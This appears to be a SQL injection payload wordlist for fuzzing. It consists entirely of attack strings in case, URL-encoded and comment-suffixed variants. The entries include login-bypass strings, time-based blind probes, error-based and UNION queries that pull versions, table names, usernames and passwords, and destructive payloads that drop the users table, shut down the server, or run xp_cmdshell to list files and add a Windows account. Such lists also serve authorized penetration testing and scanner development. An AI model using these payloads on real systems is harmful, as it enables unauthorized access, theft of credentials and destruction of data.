" OR "1"="1" --
" OR "1"="1" ----test
" OR "1"="1" --/*test*/
" OR "1"="1"#
" OR "1"="1"#--test
" OR "1"="1"#/*test*/
" or "1"="1" --
" or "1"="1"#
%27%20AND%20SLEEP(5)--
%27%20AND%20SLEEP(5)----test
%27%20AND%20SLEEP(5)--/*test*/
%27%20OR%201=1--
%27%20OR%201=1----test
%27%20OR%201=1--/*test*/
%27%20UNION%20SELECT%20NULL,NULL--
%27%20UNION%20SELECT%20NULL,NULL----test
%27%20UNION%20SELECT%20NULL,NULL--/*test*/
%27%20and%20sleep(5)--
%27%20or%201=1--
%27%20union%20select%20null,null--
%27;%20WAITFOR%20DELAY%20%270:0:5%27--
%27;%20WAITFOR%20DELAY%20%270:0:5%27----test
%27;%20WAITFOR%20DELAY%20%270:0:5%27--/*test*/
%27;%20waitfor%20delay%20%270:0:5%27--
' AND (SELECT SUBSTRING(@@VERSION,1,1))='5' --
' AND (SELECT SUBSTRING(@@version,1,1))='5' --
' AND (SELECT SUBSTRING(@@version,1,1))='5' ----test
' AND (SELECT SUBSTRING(@@version,1,1))='5' --/*test*/
' AND 1=0 AND '1'='1' --
' AND 1=0 AND '1'='1' ----test
' AND 1=0 AND '1'='1' --/*test*/
' AND 1=1 AND '1'='1' --
' AND 1=1 AND '1'='1' ----test
' AND 1=1 AND '1'='1' --/*test*/
' AND 1=1--
' AND 1=1----test
' AND 1=1--/*test*/
' AND 1=2--
' AND 1=2----test
' AND 1=2--/*test*/
' AND 1=CONVERT(INT, (SELECT @@VERSION))--
' AND 1=CONVERT(int, (SELECT @@version))--
' AND 1=CONVERT(int, (SELECT @@version))----test
' AND 1=CONVERT(int, (SELECT @@version))--/*test*/
' AND ASCII(SUBSTRING(@@VERSION,1,1)) = 77 --
' AND ASCII(SUBSTRING(@@version,1,1)) = 77 --
' AND ASCII(SUBSTRING(@@version,1,1)) = 77 ----test
' AND ASCII(SUBSTRING(@@version,1,1)) = 77 --/*test*/
' AND EXTRACTVALUE(1,CONCAT(0X7E,(SELECT VERSION())))--
' AND UPDATEXML(1,CONCAT(0X7E,(SELECT USER())),0)--
' AND extractvalue(1,concat(0x7e,(SELECT version())))--
' AND extractvalue(1,concat(0x7e,(SELECT version())))----test
' AND extractvalue(1,concat(0x7e,(SELECT version())))--/*test*/
' AND updatexml(1,concat(0x7e,(SELECT user())),0)--
' AND updatexml(1,concat(0x7e,(SELECT user())),0)----test
' AND updatexml(1,concat(0x7e,(SELECT user())),0)--/*test*/
' OR ''='
' OR ''='--test
' OR ''='/*test*/
' OR '1'='1' --
' OR '1'='1' ----test
' OR '1'='1' --/*test*/
' OR '1'='1'#
' OR '1'='1'#--test
' OR '1'='1'#/*test*/
' OR 'X' LIKE 'X
' OR 'X'='X
' OR 'x' LIKE 'x
' OR 'x' LIKE 'x--test
' OR 'x' LIKE 'x/*test*/
' OR 'x'='x
' OR 'x'='x--test
' OR 'x'='x/*test*/
' OR 1=1 AND 'A'='A
' OR 1=1 AND 'a'='a
' OR 1=1 AND 'a'='a--test
' OR 1=1 AND 'a'='a/*test*/
' OR 1=1 LIMIT 1 OFFSET 0--
' OR 1=1 LIMIT 1 OFFSET 0----test
' OR 1=1 LIMIT 1 OFFSET 0--/*test*/
' OR 1=1#
' OR 1=1#--test
' OR 1=1#/*test*/
' OR 1=1--
' OR 1=1-- -
' OR 1=1-- ---test
' OR 1=1-- -/*test*/
' OR 1=1/*
' OR 1=1/*--test
' OR 1=1/*/*test*/
' OR BENCHMARK(1000000,MD5('A'))--
' OR BENCHMARK(1000000,MD5('A'))----test
' OR BENCHMARK(1000000,MD5('A'))--/*test*/
' OR EXISTS(SELECT * FROM USERS)--
' OR EXISTS(SELECT * FROM users)--
' OR EXISTS(SELECT * FROM users)----test
' OR EXISTS(SELECT * FROM users)--/*test*/
' OR NOT EXISTS(SELECT * FROM DENIED)--
' OR NOT EXISTS(SELECT * FROM denied)--
' OR NOT EXISTS(SELECT * FROM denied)----test
' OR NOT EXISTS(SELECT * FROM denied)--/*test*/
' OR SLEEP(5)#
' OR SLEEP(5)#--test
' OR SLEEP(5)#/*test*/
' Or 1=1--
' Or 1=1----test
' Or 1=1--/*test*/
' and (select substring(@@version,1,1))='5' --
' and 1=0 and '1'='1' --
' and 1=1 and '1'='1' --
' and 1=1--
' and 1=2--
' and 1=convert(int, (select @@version))--
' and ascii(substring(@@version,1,1)) = 77 --
' and extractvalue(1,concat(0x7e,(select version())))--
' and updatexml(1,concat(0x7e,(select user())),0)--
' oR 1=1#
' oR 1=1#--test
' oR 1=1#/*test*/
' oR 1=1--
' oR 1=1----test
' oR 1=1--/*test*/
' or ''='
' or '1'='1' --
' or '1'='1'#
' or 'x' like 'x
' or 'x'='x
' or 1=1 and 'a'='a
' or 1=1 limit 1 offset 0--
' or 1=1#
' or 1=1--
' or 1=1-- -
' or 1=1/*
' or benchmark(1000000,md5('a'))--
' or exists(select * from users)--
' or not exists(select * from denied)--
' or sleep(5)#
' || '1' LIKE '1
' || '1' LIKE '1--test
' || '1' LIKE '1/*test*/
' || '1' like '1
' || '1'='1
' || '1'='1--test
' || '1'='1/*test*/
'%20OR%201=1--
'%20OR%201=1----test
'%20OR%201=1--/*test*/
'%20or%201=1--
') OR '1'='1
') OR '1'='1--test
') OR '1'='1/*test*/
') OR ('1'='1' --
') OR ('1'='1' ----test
') OR ('1'='1' --/*test*/
') or '1'='1
') or ('1'='1' --
'/**/OR/**/1=1--
'/**/OR/**/1=1----test
'/**/OR/**/1=1--/*test*/
'/**/or/**/1=1--
'; DECLARE @Q VARCHAR(99);SET @Q='DIR';EXEC(@Q);--
'; DROP TABLE USERS; --
'; DROP TABLE users; --
'; DROP TABLE users; ----test
'; DROP TABLE users; --/*test*/
'; EXEC MASTER..XP_CMDSHELL 'NET USER TEST TEST /ADD'; --
'; declare @q varchar(99);set @q='dir';exec(@q);--
'; declare @q varchar(99);set @q='dir';exec(@q);----test
'; declare @q varchar(99);set @q='dir';exec(@q);--/*test*/
'; drop table users; --
'; exec master..xp_cmdshell 'net user test test /add'; --
'; exec master..xp_cmdshell 'net user test test /add'; ----test
'; exec master..xp_cmdshell 'net user test test /add'; --/*test*/
(" OR "1"="1" --)
(" OR "1"="1"#)
(%27%20AND%20SLEEP(5)--)
(%27%20OR%201=1--)
(%27%20UNION%20SELECT%20NULL,NULL--)
(%27;%20WAITFOR%20DELAY%20%270:0:5%27--)
(' AND (SELECT SUBSTRING(@@version,1,1))='5' --)
(' AND 1=0 AND '1'='1' --)
(' AND 1=1 AND '1'='1' --)
(' AND 1=1--)
(' AND 1=2--)
(' AND 1=CONVERT(int, (SELECT @@version))--)
(' AND ASCII(SUBSTRING(@@version,1,1)) = 77 --)
(' AND extractvalue(1,concat(0x7e,(SELECT version())))--)
(' AND updatexml(1,concat(0x7e,(SELECT user())),0)--)
(' OR ''=')
(' OR '1'='1' --)
(' OR '1'='1'#)
(' OR 'x' LIKE 'x)
(' OR 'x'='x)
(' OR 1=1 AND 'a'='a)
(' OR 1=1 LIMIT 1 OFFSET 0--)
(' OR 1=1#)
(' OR 1=1-- -)
(' OR 1=1/*)
(' OR BENCHMARK(1000000,MD5('A'))--)
(' OR EXISTS(SELECT * FROM users)--)
(' OR NOT EXISTS(SELECT * FROM denied)--)
(' OR SLEEP(5)#)
(' Or 1=1--)
(' oR 1=1#)
(' oR 1=1--)
(' || '1' LIKE '1)
(' || '1'='1)
('%20OR%201=1--)
(') OR '1'='1)
(') OR ('1'='1' --)
('/**/OR/**/1=1--)
('; DROP TABLE users; --)
('; declare @q varchar(99);set @q='dir';exec(@q);--)
('; exec master..xp_cmdshell 'net user test test /add'; --)
(-1' OR '1'='1)
(0 OR 1=1)
(0 OR 1=1--)
(1' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT database()), 0x3a, FLOOR(RAND(0)*2)) AS x FROM information_schema.tables GROUP BY x) a)--)
(1' AND 1=0 UNION ALL SELECT NULL, NULL--)
(1' AND SLEEP(5)--)
(1' OR '1' = '1)
(1' OR 'x'='x'--)
(1' OR 1=1--+)
(1' UNION ALL SELECT NULL,NULL,NULL--)
(1' UNION SELECT NULL, version()--)
(1' UNION SELECT null, null--)
(1' UNION SELECT table_name, NULL FROM information_schema.tables--)
(1' UNION SELECT username, password FROM users--)
(1'; EXEC xp_cmdshell('dir')--)
(1'; WAITFOR DELAY '0:0:5'--)
(1) OR (1=1)
(1); DROP TABLE users--)
(1); SELECT pg_sleep(5); --)
(1); SHUTDOWN --)
(admin" --)
(admin' #)
(admin' --)
(admin' or 'x'='x)
(admin' or 1=1--)
(admin' or benchmark(5000000,MD5(1))--)
(admin' or pg_sleep(5) --)
(admin' or sleep(5) --)
(admin') --)
-1' OR '1'='1
-1' OR '1'='1--test
-1' OR '1'='1/*test*/
-1' or '1'='1
0 OR 1=1
0 OR 1=1--
0 OR 1=1----test
0 OR 1=1--/*test*/
0 OR 1=1--test
0 OR 1=1/*test*/
0 or 1=1
0 or 1=1--
1' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT DATABASE()), 0X3A, FLOOR(RAND(0)*2)) AS X FROM INFORMATION_SCHEMA.TABLES GROUP BY X) A)--
1' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT database()), 0x3a, FLOOR(RAND(0)*2)) AS x FROM information_schema.tables GROUP BY x) a)--
1' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT database()), 0x3a, FLOOR(RAND(0)*2)) AS x FROM information_schema.tables GROUP BY x) a)----test
1' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT database()), 0x3a, FLOOR(RAND(0)*2)) AS x FROM information_schema.tables GROUP BY x) a)--/*test*/
1' AND 1=0 UNION ALL SELECT NULL, NULL--
1' AND 1=0 UNION ALL SELECT NULL, NULL----test
1' AND 1=0 UNION ALL SELECT NULL, NULL--/*test*/
1' AND SLEEP(5)--
1' AND SLEEP(5)----test
1' AND SLEEP(5)--/*test*/
1' OR '1' = '1
1' OR '1' = '1--test
1' OR '1' = '1/*test*/
1' OR 'X'='X'--
1' OR 'x'='x'--
1' OR 'x'='x'----test
1' OR 'x'='x'--/*test*/
1' OR 1=1--+
1' OR 1=1--+--test
1' OR 1=1--+/*test*/
1' UNION ALL SELECT NULL,NULL,NULL--
1' UNION ALL SELECT NULL,NULL,NULL----test
1' UNION ALL SELECT NULL,NULL,NULL--/*test*/
1' UNION SELECT NULL, NULL--
1' UNION SELECT NULL, VERSION()--
1' UNION SELECT NULL, version()--
1' UNION SELECT NULL, version()----test
1' UNION SELECT NULL, version()--/*test*/
1' UNION SELECT TABLE_NAME, NULL FROM INFORMATION_SCHEMA.TABLES--
1' UNION SELECT USERNAME, PASSWORD FROM USERS--
1' UNION SELECT null, null--
1' UNION SELECT null, null----test
1' UNION SELECT null, null--/*test*/
1' UNION SELECT table_name, NULL FROM information_schema.tables--
1' UNION SELECT table_name, NULL FROM information_schema.tables----test
1' UNION SELECT table_name, NULL FROM information_schema.tables--/*test*/
1' UNION SELECT username, password FROM users--
1' UNION SELECT username, password FROM users----test
1' UNION SELECT username, password FROM users--/*test*/
1' and (select 1 from (select count(*), concat((select database()), 0x3a, floor(rand(0)*2)) as x from information_schema.tables group by x) a)--
1' and 1=0 union all select null, null--
1' and sleep(5)--
1' or '1' = '1
1' or 'x'='x'--
1' or 1=1--+
1' union all select null,null,null--
1' union select null, null--
1' union select null, version()--
1' union select table_name, null from information_schema.tables--
1' union select username, password from users--
1'; EXEC XP_CMDSHELL('DIR')--
1'; EXEC xp_cmdshell('dir')--
1'; EXEC xp_cmdshell('dir')----test
1'; EXEC xp_cmdshell('dir')--/*test*/
1'; WAITFOR DELAY '0:0:5'--
1'; WAITFOR DELAY '0:0:5'----test
1'; WAITFOR DELAY '0:0:5'--/*test*/
1'; exec xp_cmdshell('dir')--
1'; waitfor delay '0:0:5'--
1) OR (1=1
1) OR (1=1--test
1) OR (1=1/*test*/
1) or (1=1
1); DROP TABLE USERS--
1); DROP TABLE users--
1); DROP TABLE users----test
1); DROP TABLE users--/*test*/
1); SELECT PG_SLEEP(5); --
1); SELECT pg_sleep(5); --
1); SELECT pg_sleep(5); ----test
1); SELECT pg_sleep(5); --/*test*/
1); SHUTDOWN --
1); SHUTDOWN ----test
1); SHUTDOWN --/*test*/
1); drop table users--
1); select pg_sleep(5); --
1); shutdown --
ADMIN" --
ADMIN' #
ADMIN' --
ADMIN' OR 'X'='X
ADMIN' OR 1=1--
ADMIN' OR BENCHMARK(5000000,MD5(1))--
ADMIN' OR PG_SLEEP(5) --
ADMIN' OR SLEEP(5) --
ADMIN') --
admin" --
admin" ----test
admin" --/*test*/
admin' #
admin' #--test
admin' #/*test*/
admin' --
admin' ----test
admin' --/*test*/
admin' or 'x'='x
admin' or 'x'='x--test
admin' or 'x'='x/*test*/
admin' or 1=1--
admin' or 1=1----test
admin' or 1=1--/*test*/
admin' or benchmark(5000000,MD5(1))--
admin' or benchmark(5000000,MD5(1))----test
admin' or benchmark(5000000,MD5(1))--/*test*/
admin' or benchmark(5000000,md5(1))--
admin' or pg_sleep(5) --
admin' or pg_sleep(5) ----test
admin' or pg_sleep(5) --/*test*/
admin' or sleep(5) --
admin' or sleep(5) ----test
admin' or sleep(5) --/*test*/
admin') --
admin') ----test
admin') --/*test*/
